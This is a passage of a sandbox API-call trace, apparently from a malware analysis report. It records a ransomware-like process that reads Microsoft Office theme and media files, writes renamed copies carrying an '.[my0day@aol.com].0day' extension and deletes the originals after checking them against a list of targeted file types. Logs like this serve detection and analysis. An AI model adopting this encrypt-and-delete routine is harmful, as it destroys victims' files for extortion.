lpNumberOfBytesWritten=0x3a5fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0273.762] SetEndOfFile (hFile=0x39c) returned 1 [0273.762] CloseHandle (hObject=0x39c) returned 1 [0273.762] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.762] SetEndOfFile (hFile=0x354) returned 1 [0273.894] CloseHandle (hObject=0x354) returned 1 [0273.894] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0273.964] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\newsprint.eftx")) returned 1 [0273.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81 [0273.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81 [0273.964] lstrlenW (lpString=".doc") returned 4 [0273.964] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0273.964] lstrlenW (lpString=".docx") returned 5 [0273.964] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0273.964] lstrlenW (lpString=".pdf") returned 4 [0273.964] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0273.964] lstrlenW (lpString=".xls") returned 4 [0273.964] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0273.964] lstrlenW (lpString=".xlsx") returned 5 [0273.964] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0273.964] lstrlenW (lpString=".ppt") returned 4 [0273.964] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0273.964] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81 [0273.964] lstrlenW (lpString=".zip") returned 4 [0273.965] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0273.965] lstrlenW (lpString=".rar") returned 4 [0273.965] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0273.965] lstrlenW (lpString=".bz2") returned 4 [0273.965] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0273.965] lstrlenW (lpString=".7z") returned 3 [0273.965] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0273.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81 [0273.965] lstrlenW (lpString=".dbf") returned 4 [0273.965] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0273.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81 [0273.965] lstrlenW (lpString=".1cd") returned 4 [0273.965] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0273.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81 [0273.965] lstrlenW (lpString=".jpg") returned 4 [0273.965] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0273.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81 [0273.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81 [0273.965] lstrlenW (lpString=".doc") returned 4 [0273.965] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0273.965] lstrlenW (lpString=".docx") returned 5 [0273.965] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0273.965] lstrlenW (lpString=".pdf") returned 4 [0273.965] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0273.965] lstrlenW (lpString=".xls") returned 4 [0273.965] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0273.965] lstrlenW (lpString=".xlsx") returned 5 [0273.965] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0273.965] lstrlenW (lpString=".ppt") returned 4 [0273.965] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0273.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81 [0273.965] lstrlenW (lpString=".zip") returned 4 [0273.965] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0273.965] lstrlenW (lpString=".rar") returned 4 [0273.965] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0273.965] lstrlenW (lpString=".bz2") returned 4 [0273.965] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0273.966] lstrlenW (lpString=".7z") returned 3 [0273.966] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0273.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81 [0273.966] lstrlenW (lpString=".dbf") returned 4 [0273.966] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0273.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81 [0273.966] lstrlenW (lpString=".1cd") returned 4 [0273.966] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0273.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned 81 [0273.966] lstrlenW (lpString=".jpg") returned 4 [0273.966] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0273.966] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0273.966] lstrlenW (lpString="Solstice.eftx") returned 13 [0273.966] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\solstice.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0273.998] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x3a5ff1c | out: lpFileSize=0x3a5ff1c*=27781) returned 1 [0273.998] CloseHandle (hObject=0x318) returned 1 [0273.998] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\solstice.eftx")) returned 0x20 [0274.050] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\solstice.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.051] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\solstice.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0274.051] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.051] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.051] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\solstice.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0274.066] GetLastError () returned 0x0 [0274.066] ReadFile (in: hFile=0x354, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x6c85, lpOverlapped=0x0) returned 1 [0274.125] WriteFile (in: hFile=0x39c, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x6c90, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0x6c90, lpOverlapped=0x0) returned 1 [0274.126] ReadFile (in: hFile=0x354, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.126] WriteFile (in: hFile=0x39c, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0xee, lpOverlapped=0x0) returned 1 [0274.126] SetEndOfFile (hFile=0x39c) returned 1 [0274.126] CloseHandle (hObject=0x39c) returned 1 [0274.126] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.126] SetEndOfFile (hFile=0x354) returned 1 [0274.129] CloseHandle (hObject=0x354) returned 1 [0274.129] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.129] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\solstice.eftx")) returned 1 [0274.129] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80 [0274.129] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80 [0274.129] lstrlenW (lpString=".doc") returned 4 [0274.129] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0274.129] lstrlenW (lpString=".docx") returned 5 [0274.129] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0274.129] lstrlenW (lpString=".pdf") returned 4 [0274.130] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0274.130] lstrlenW (lpString=".xls") returned 4 [0274.130] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0274.130] lstrlenW (lpString=".xlsx") returned 5 [0274.130] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0274.130] lstrlenW (lpString=".ppt") returned 4 [0274.130] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0274.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80 [0274.130] lstrlenW (lpString=".zip") returned 4 [0274.130] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0274.130] lstrlenW (lpString=".rar") returned 4 [0274.130] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0274.130] lstrlenW (lpString=".bz2") returned 4 [0274.130] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0274.130] lstrlenW (lpString=".7z") returned 3 [0274.130] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0274.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80 [0274.130] lstrlenW (lpString=".dbf") returned 4 [0274.130] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0274.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80 [0274.130] lstrlenW (lpString=".1cd") returned 4 [0274.130] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0274.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80 [0274.130] lstrlenW (lpString=".jpg") returned 4 [0274.130] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0274.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80 [0274.130] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80 [0274.130] lstrlenW (lpString=".doc") returned 4 [0274.130] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0274.130] lstrlenW (lpString=".docx") returned 5 [0274.130] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0274.130] lstrlenW (lpString=".pdf") returned 4 [0274.130] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0274.130] lstrlenW (lpString=".xls") returned 4 [0274.130] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0274.130] lstrlenW (lpString=".xlsx") returned 5 [0274.131] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0274.131] lstrlenW (lpString=".ppt") returned 4 [0274.131] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0274.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80 [0274.131] lstrlenW (lpString=".zip") returned 4 [0274.131] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0274.131] lstrlenW (lpString=".rar") returned 4 [0274.131] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0274.131] lstrlenW (lpString=".bz2") returned 4 [0274.131] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0274.131] lstrlenW (lpString=".7z") returned 3 [0274.131] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0274.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80 [0274.131] lstrlenW (lpString=".dbf") returned 4 [0274.131] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0274.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80 [0274.131] lstrlenW (lpString=".1cd") returned 4 [0274.131] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0274.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx") returned 80 [0274.131] lstrlenW (lpString=".jpg") returned 4 [0274.131] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0274.131] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0274.131] lstrlenW (lpString="Waveform.eftx") returned 13 [0274.131] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\waveform.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0274.132] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x3a5ff1c | out: lpFileSize=0x3a5ff1c*=112504) returned 1 [0274.132] CloseHandle (hObject=0x354) returned 1 [0274.132] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\waveform.eftx")) returned 0x20 [0274.162] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\waveform.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.585] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\waveform.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0274.623] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.623] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.623] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\waveform.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0274.792] GetLastError () returned 0x0 [0274.792] ReadFile (in: hFile=0x37c, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x1b778, lpOverlapped=0x0) returned 1 [0274.798] WriteFile (in: hFile=0x390, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x1b780, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0x1b780, lpOverlapped=0x0) returned 1 [0274.800] ReadFile (in: hFile=0x37c, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.801] WriteFile (in: hFile=0x390, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0xee, lpOverlapped=0x0) returned 1 [0274.801] SetEndOfFile (hFile=0x390) returned 1 [0274.801] CloseHandle (hObject=0x390) returned 1 [0274.801] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.801] SetEndOfFile (hFile=0x37c) returned 1 [0274.805] CloseHandle (hObject=0x37c) returned 1 [0274.805] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.850] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\waveform.eftx")) returned 1 [0274.850] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0274.850] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0274.850] lstrlenW (lpString=".doc") returned 4 [0274.850] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0274.850] lstrlenW (lpString=".docx") returned 5 [0274.850] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0274.850] lstrlenW (lpString=".pdf") returned 4 [0274.850] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0274.850] lstrlenW (lpString=".xls") returned 4 [0274.850] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0274.850] lstrlenW (lpString=".xlsx") returned 5 [0274.850] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0274.850] lstrlenW (lpString=".ppt") returned 4 [0274.851] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0274.851] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0274.851] lstrlenW (lpString=".zip") returned 4 [0274.851] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0274.851] lstrlenW (lpString=".rar") returned 4 [0274.851] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0274.851] lstrlenW (lpString=".bz2") returned 4 [0274.851] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0274.851] lstrlenW (lpString=".7z") returned 3 [0274.851] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0274.851] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0274.851] lstrlenW (lpString=".dbf") returned 4 [0274.851] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0274.851] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0274.851] lstrlenW (lpString=".1cd") returned 4 [0274.851] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0274.851] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0274.851] lstrlenW (lpString=".jpg") returned 4 [0274.851] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0274.851] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0274.851] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0274.851] lstrlenW (lpString=".doc") returned 4 [0274.851] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0274.851] lstrlenW (lpString=".docx") returned 5 [0274.851] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0274.851] lstrlenW (lpString=".pdf") returned 4 [0274.851] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0274.851] lstrlenW (lpString=".xls") returned 4 [0274.851] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0274.851] lstrlenW (lpString=".xlsx") returned 5 [0274.851] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0274.851] lstrlenW (lpString=".ppt") returned 4 [0274.851] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0274.851] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0274.852] lstrlenW (lpString=".zip") returned 4 [0274.852] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0274.852] lstrlenW (lpString=".rar") returned 4 [0274.852] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0274.852] lstrlenW (lpString=".bz2") returned 4 [0274.852] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0274.852] lstrlenW (lpString=".7z") returned 3 [0274.852] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0274.852] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0274.852] lstrlenW (lpString=".dbf") returned 4 [0274.852] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0274.852] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0274.852] lstrlenW (lpString=".1cd") returned 4 [0274.852] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0274.852] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Waveform.eftx") returned 80 [0274.852] lstrlenW (lpString=".jpg") returned 4 [0274.852] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0274.852] lstrcmpiW (lpString1=".MMW", lpString2=".0day") returned 1 [0274.852] lstrlenW (lpString="OFFICE10.MMW") returned 12 [0274.852] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.mmw"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0274.897] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x3a5ff1c | out: lpFileSize=0x3a5ff1c*=492624) returned 1 [0274.897] CloseHandle (hObject=0x394) returned 1 [0274.897] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.mmw")) returned 0x20 [0274.912] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.mmw.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.912] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.mmw"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0274.912] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.912] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.912] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.mmw.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0274.913] GetLastError () returned 0x0 [0274.913] ReadFile (in: hFile=0x3a8, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x78450, lpOverlapped=0x0) returned 1 [0274.924] WriteFile (in: hFile=0x318, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x78460, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0x78460, lpOverlapped=0x0) returned 1 [0274.934] ReadFile (in: hFile=0x3a8, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x3a5fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.934] WriteFile (in: hFile=0x318, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x3a5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.934] SetEndOfFile (hFile=0x318) returned 1 [0274.934] CloseHandle (hObject=0x318) returned 1 [0274.934] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.934] SetEndOfFile (hFile=0x3a8) returned 1 [0274.945] CloseHandle (hObject=0x3a8) returned 1 [0274.945] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.945] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\OFFICE10.MMW" (normalized: "c:\\program files\\microsoft office\\media\\office14\\office10.mmw")) returned 1 [0274.946] lstrlenW (lpString="C:\\Program Files\\Microsoft 